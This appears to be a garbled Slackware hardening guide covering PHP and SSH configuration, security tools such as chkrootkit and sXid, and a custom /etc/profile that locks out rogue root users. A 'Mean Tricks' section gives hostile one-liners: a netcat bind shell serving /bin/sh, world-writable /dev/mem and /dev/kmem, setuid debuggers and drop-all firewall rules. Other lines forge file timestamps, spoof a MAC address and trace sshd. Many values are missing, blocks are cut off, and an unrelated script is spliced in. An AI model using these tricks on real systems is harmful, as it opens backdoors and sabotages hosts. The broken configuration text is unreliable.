        variables_order = "ES"
        expose_php = Off
        allow_url_fopen = Off
        open_basedir = /var/www
        ; eval, include, require, include_once and require_once are language
        ; constructs, not functions, so disable_functions has no effect on them
        disable_functions = system,exec,shell_exec,eval,include,require,include_once,require_once,preg_replace
        safe_mode = On
        safe_mode_include_dir = /usr/php/include
        safe_mode_exec_dir = /usr/php/bin
        safe_mode_gid = On
        safe_mode_allowed_env_vars = PHP_
        safe_mode_protected_env_vars = LD_LIBRARY_PATH

    root@darkstar:~# touch /var/log/apache/php_errors
    root@darkstar:~# mkdir -p /usr/php/include
    root@darkstar:~# mkdir /usr/php/bin

    man httpd
    man php

    # Host *
    ForwardAgent no
    ForwardX11 no
    RhostsRSAAuthentication no
    RSAAuthentication no
    PasswordAuthentication yes
    HostbasedAuthentication no
    BatchMode no
    CheckHostIP yes
    AddressFamily any
    ConnectTimeout 0
    StrictHostKeyChecking ask
    # IdentityFile ~/.ssh/identity
    IdentityFile ~/.ssh/id_rsa
    IdentityFile ~/.ssh/id_dsa
    Port 22
    Protocol 2
    # Cipher 3des
    # Ciphers aes256-cbc,aes256-ctr
    EscapeChar ~
    Compression yes
    HashKnownHosts yes
    EnableSSHKeysign no
    LogLevel DEBUG
    PubkeyAuthentication yes
    ServerAliveInterval 60
    ServerAliveCountMax 10
    TCPKeepAlive no
    UserKnownHostsFile ~/.ssh/known_hosts     

    Port 22
    Protocol 2
    AddressFamily inet

    # HostKey for protocol version 1
    #HostKey /etc/ssh/ssh_host_key
    # HostKeys for protocol version 2
    HostKey /etc/ssh/ssh_host_rsa_key
    HostKey /etc/ssh/ssh_host_dsa_key

    # Lifetime and size of ephemeral version 1 server key
    #KeyRegenerationInterval 1h
    #ServerKeyBits 768

    # Logging
    # obsoletes QuietMode and FascistLogging
    SyslogFacility AUTH
    LogLevel DEBUG

    # Authentication:

    LoginGraceTime 2m
    PermitRootLogin no
    StrictModes yes
    MaxAuthTries 6

    AllowUsers dentonj@trustedhost
    AllowGroups wheel

    RSAAuthentication no
    PubkeyAuthentication yes
    AuthorizedKeysFile     .ssh/authorized_keys

    # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
    RhostsRSAAuthentication no
    # similar for protocol version 2
    HostbasedAuthentication no
    # Change to yes if you don't trust ~/.ssh/known_hosts for
    # RhostsRSAAuthentication and HostbasedAuthentication
    IgnoreUserKnownHosts no
    # Don't read the user's ~/.rhosts and ~/.shosts files
    IgnoreRhosts yes

    # To disable tunneled clear text passwords, change to no here!
    PasswordAuthentication no
    PermitEmptyPasswords no

    # Change to no to disable s/key passwords
    #ChallengeResponseAuthentication yes

    # Kerberos options
    #KerberosAuthentication no
    #KerberosOrLocalPasswd yes
    #KerberosTicketCleanup yes
    #KerberosGetAFSToken no

    # GSSAPI options
    #GSSAPIAuthentication no
    #GSSAPICleanupCredentials yes

    #UsePAM no

    AllowTcpForwarding yes
    GatewayPorts no
    X11Forwarding no
    X11DisplayOffset 10
    X11UseLocalhost yes
    PrintMotd yes
    PrintLastLog yes
    TCPKeepAlive no
    UseLogin no
    UsePrivilegeSeparation yes
    PermitUserEnvironment no
    Compression delayed
    ClientAliveInterval 60
    ClientAliveCountMax 10
    UseDNS yes
    PidFile /var/run/
    #MaxStartups 10

    # no default banner path
    Banner /etc/

    # override default of no subsystems
    #Subsystem     sftp    /usr/libexec/sftp-server

    # Ciphers aes256-cbc,aes256-ctr     

    # login.conf(5) is not used in Slackware
    ChallengeResponseAuthentication no     

    root@darkstar:~# chmod u-s /usr/libexec/ssh-keysign     

    man ssh
    man sshd
    man ssh_config
    man sshd_config



    root@darkstar:~# less /var/lib/mysql/darkstar.err

    man mysql_fix_privilege_tables


    root@darkstar:~# removepkg nfs-utils


    root@darkstar:~# removepkg yptools

----[ Security Programs/Scripts ]----


gnupg:
    On the Slackware Source CD 3:

    mount /mnt/cdrom
    cd /mnt/cdrom/testing/packages
    installpkg gnupg-1.4.2-i486-1.tgz

libsafe:
    On the Slackware Source CD 3:
    mount /mnt/cdrom
    cd /mnt/cdrom/extra/libsafe-2.0.16
    installpkg libsafe-2.0.16-i386-1.tgz



sXid:
    root@darkstar:~# cp sxid_4.0.5.tar.gz src
    root@darkstar:~# cd src
    root@darkstar:~/src# gzip -cd sxid_4.0.5.tar.gz | tar xvf -
    root@darkstar:~/src# cd sxid-4.0.5
    root@darkstar:~/src/sxid-4.0.5# less README
    root@darkstar:~/src/sxid-4.0.5# make install


        ALWAYS_NOTIFY = "yes"
        ALWAYS_ROTATE = "yes"
        IGNORE_DIRS = ""



    root@darkstar:~# chmod 700 /etc/cron.daily/sxid
    root@darkstar:~# sxid


chkrootkit:
    root@darkstar:~# cp chkrootkit_0.46a.tar.gz src/
    root@darkstar:~# cd src
    root@darkstar:~/src# gzip -cd chkrootkit_0.46a.tar.gz | tar xvf -
    root@darkstar:~/src# cd chkrootkit-0.46a
    root@darkstar:~/src/chkrootkit-0.46a# less README
    root@darkstar:~/src/chkrootkit-0.46a# make sense

    Copy the following to /usr/local/sbin:

    root@darkstar:~# crontab -e
        # Chkrootkit, results are mailed to root
        10 4 * * * ( cd /usr/local/sbin && ./chkrootkit 2>&1)
    root@darkstar:~# killall -HUP crond



lcap:
    root@darkstar:~# cp lcap_0.0.6.orig.tar.gz src/
    root@darkstar:~# cd src
    root@darkstar:~/src# gzip -cd lcap_0.0.6.orig.tar.gz | tar xvf -
    root@darkstar:~/src# cd lcap-0.0.6/
    root@darkstar:~/src/lcap-0.0.6# less README
    root@darkstar:~/src/lcap-0.0.6# make
    root@darkstar:~/src/lcap-0.0.6# strip lcap
    root@darkstar:~/src/lcap-0.0.6# cp lcap /usr/local/sbin

----[ Usability/Reducing Security ]----

Run X applications as root:
    The Linux Security Cookbook contains a short script that will set DISPLAY
    and XAUTHORITY to allow root to run X apps. Or you can cheat by setting
    DISPLAY and HOME to accomplish the same thing.

    root@darkstar:~# xv
    xv: Can't open display
    root@darkstar:~# DISPLAY=:0.0
    root@darkstar:~# xv
    Xlib: connection to ":0.0" refused by server
    Xlib: Invalid MIT-MAGIC-COOKIE-1 key
    xv: Can't open display
    root@darkstar:~# HOME=/home/dentonj
    root@darkstar:~# xv
    A better way is to use xauth and set the MIT-MAGIC-COOKIE:
    root@darkstar:~# xauth -f /home/dentonj/.Xauthority extract - :0 | \
        xauth merge -
    root@darkstar:~# xauth list
    darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
    dentonj@darkstar:~$ xauth list
    darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
    localhost:0 MIT-MAGIC-COOKIE-1 9876543219fedcba9876543210fedcba

    You still have to set DISPLAY for root. Be aware that setting DISPLAY in a
    shell config file (e.g. - /etc/profile) may cause problems with X
    forwarding in ssh.

    man xauth
    man Xsecurity

    I like to dig around inside of binaries. Uncomment the following lines:

    *) FILE=`file -L "$1"` ; # Check to see if binary, if so -- view with 'strings'
    FILE1=`echo $FILE | cut -d ' ' -f 2`
    FILE2=`echo $FILE | cut -d ' ' -f 3`
    if [ "$FILE1" = "Linux/i386" -o "$FILE2" = "Linux/i386" \
         -o "$FILE1" = "ELF" -o "$FILE2" = "ELF" ]; then
     strings "$1"
    fi ;;

Error Beep:
I make extensive use of tab completion in bash. However, the error beeps
tend to annoy those around me. Here are three ways to turn off the error

     setterm -bfreq 0

     xset -b
     exec /usr/X11R6/bin/startfluxbox

     set bell-style none

man bash
----[ Mean Tricks ]----

    opensaysme:         | nc -l -p 44444 -e /bin/sh

    | nc -l -p 44444 -e /bin/sh

    NO_PASSWORD_CONSOLE tty1,tty2,tty3,tty4,tty5,tty6

    touch /etc/forcefsck



iptables -m random

iptables -A FORWORD -s -m random --average 90 -j DROP

iptables -A INPUT -j DROP

Anywhere in /etc/rc.d:

enable -n enable    

chmod u+s /usr/bin/strace

chmod u+s /usr/bin/gdb

chmod 666 /dev/mem

chmod 666 /dev/kmem

chmod 666 /dev/port

ifconfig eth0 mtu 68

touch ./-r

----[ Useful Commands ]----

ldd /usr/bin/lppasswd
/lib/ --list /usr/bin/lppasswd

strings /usr/bin/lppasswd

List some of the popular REM commands used.

man -k cron

grep crond /var/log/packages/*

# Regular files only: the original relied on ls -F's "@" suffix to skip
# symlinks, which file(1) would report as links rather than as binaries
find /bin -maxdepth 1 -type f -exec file {} \; | grep "not stripped"

for i in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin;
do echo $i; find $i -maxdepth 1 -type f -exec file {} \; \
| grep "not stripped"; done

which kill
type -a kill

stat /bin/login
touch example
stat example
touch -r /bin/login example
stat example

strace -p 19148 -f -e trace=network,read,write -o ssh_trace.out -e write=4 \
    -e read=6 # Where 19148 is the PID of sshd

ifconfig eth0 hw ether 00:00:DE:AD:BE:EF
ifconfig eth0 up -arp

ln -s /usr/bin/write /bin/write
kibitz dentonj

----[ /etc/profile ]----

# If the following variables are not set, exit with an error message
: ${USER:?Who are you?}
: ${LOGNAME:?Who are you?}
: ${HOME:?The homeless need help}

# If a user doesn't have a home directory listed in /etc/passwd,
# login is nice enough to set "/" as $HOME
if [ ${HOME} = "/" ]; then

# Kick and lockout users that are UID 0 but are not root
if [ `id -u` = "0" -a "$USER" != "root" ]; then
    # Lock the user out
    passwd -l $USER

    # Save some info
    date >> /root/SHIT
    netstat -peanut >> /root/SHIT
    ps auxww >> /root/SHIT
    w >> /root/SHIT

    w | mail -s "$USER has gained ROOT access on $HOSTNAME"

    # Let EVERYONE know
    wall << EOF
         $USER has gained ROOT access on $HOSTNAME!!!
EOF

    for i in `ls /dev/pts/`; do
      echo -e "\n$USER has gained ROOT access on $HOSTNAME!!\n" >> /dev/pts/$i
    done

    # Log it (logger -f would send the contents of a file, not this message)
    logger -is "$USER has gained ROOT access!!"

    # Let the luzer know
    echo -e "\a\n\n You are NOT root!!\n\n\a"

    # For the really paranoid (run before killing the user's processes)
    ifconfig eth0 down

    # Kill the user and their processes
    skill -9 -u $USER

    # This should be redundant
fi

export LESSOPEN="|/usr/bin/ %s"

# Set a default shell prompt (the stock Slackware prompt logic is
# commented out in favor of the root/non-root prompts below):
#if [ "$SHELL" = "/bin/pdksh" ]; then
# PS1='! $ '
#elif [ "$SHELL" = "/bin/ksh" ]; then
# PS1='! ${PWD/#$HOME/~}$ '
#elif [ "$SHELL" = "/bin/zsh" ]; then
# PS1='%n@%m:%~% '
#elif [ "$SHELL" = "/bin/ash" ]; then
# PS1='$ '
#else
# PS1='\u@\h:\w\$ '
#fi

if [ `id -u` = 0 ]; then
  # A red shell prompt for root
  PS1="\[\033[1;31m\][\j][\u@\h:\w]\[\033[0m\] "
else
  # A green shell prompt for everyone else
  PS1="\[\033[1;32m\][\j][\u@\h:\w]$\[\033[0m\] "
fi

# For non-root users, add the current directory to the search path:
if [ ! "`id -u`" = "0" ]; then

# Stuff I've added

# Add $HOME/bin to the search path
PATH="$PATH:$HOME/bin"
export PATH

export FIGNORE=".o"

# Set EDITOR for less
export EDITOR=vim

# History
# I use to set these to paranoid settings, such as 100 or 10.
export HISTSIZE=10000
export HISTFILESIZE=10000

# Display timestamp information with each history entry

# Logout if a root terminal is not being used (20 minutes idle)
if [ `id -u` = "0" ]; then
    export TMOUT=1200
fi

# Aliases
alias matrix="cmatrix -bass"
alias m="cmatrix -bass"
alias su="su -"
alias td="tcpdump -nvvSi eth0 | grcat conf.tcpdump"

# shred doesn't delete recursively
# use "/bin/rm -rf ..." for directories
alias rm="shred -uz"

# Disable the bash builtin command kill, forces the use
# of /bin/kill.
# This was a cute idea, but it prevents jobs from being killed
#enable -n kill

# Misc shell settings
shopt -s cdspell
shopt -s cmdhist
shopt -s dotglob
shopt -s extglob
setterm -bfreq 0

# grep options
export GREP_OPTIONS="-n --color"
export GREP_COLOR="1;33"

# Secure less (disables shell escapes, editing and similar from within less)
export LESSSECURE=1

# This works for single user systems if the luzer who breaks into your
# system uses an interactive shell. Both conditions must hold (-a) before
# locking: with -o the test is true for every uid, root and dentonj
# included, since no uid is both 0 and 1000.
if [ `id -u` != "0" -a `id -u` != "1000" ]; then
    passwd -l $USER
fi

# Set these and make them read only to keep users from setting them
export HISTCONTROL=""
export HISTIGNORE=""

#Disable builtin shell commands

# Set shell variables as read only, this should be last:
typeset -r HISTCONTROL
typeset -r HISTFILE
typeset -r HISTIGNORE
typeset -r HISTNAME
typeset -r HISTSIZE
typeset -r LESSSECURE
typeset -r LOGNAME
typeset -r USER
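The two lock-out tests in the profile above (UID 0 but not named root, and a uid that is neither root nor dentonj) as plain functions, written here as an added example rather than the document's own code; ALLOWED_UID and the sample logins are constructed so the decision logic can be exercised without running passwd -l or skill:

```shell
#!/bin/sh
# Added example, not part of the original /etc/profile: the two
# lock-out tests as functions taking uid and user name as
# arguments, so the logic can be exercised without passwd -l or
# skill. ALLOWED_UID is an assumed constant standing in for the
# single "dentonj" account (uid 1000 in the original test).
ALLOWED_UID=1000

# True when the login runs as uid 0 but the name is not "root".
root_impostor() {
    [ "$1" = "0" ] && [ "$2" != "root" ]
}

# True when the uid is neither root nor the permitted account.
# -a is required: no uid equals both 0 and 1000, so the original
# -o form is true for every login, dentonj included.
unexpected_uid() {
    [ "$1" != "0" -a "$1" != "$ALLOWED_UID" ]
}

# The original -o form, kept only to show the difference.
unexpected_uid_buggy() {
    [ "$1" != "0" -o "$1" != "$ALLOWED_UID" ]
}

# What the profile would do for a login: "lock-impostor" and
# "lock-unexpected" stand for passwd -l / skill, "ok" continues.
profile_decision() {
    if root_impostor "$1" "$2"; then
        echo "lock-impostor"
    elif unexpected_uid "$1"; then
        echo "lock-unexpected"
    else
        echo "ok"
    fi
}

# Constructed sample logins, as $USER and `id -u` would show them.
for entry in "0 root" "1000 dentonj" "0 toor" "1001 guest"; do
    set -- $entry
    echo "uid=$1 user=$2 -> $(profile_decision "$1" "$2")"
    echo "   buggy -o test locks: $(unexpected_uid_buggy "$1" && echo yes || echo no)"
done
```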

-- When You Are Done --

Join the irc channel #slackware on and talk about everything but Slackware.

-- Todo --

    Look into it

    Lock down the other shells.

    Modify so a different password hashing algorithm is used.

    Securing filesystems other than ext2 and ext3

    Log checking utility

-- Resources --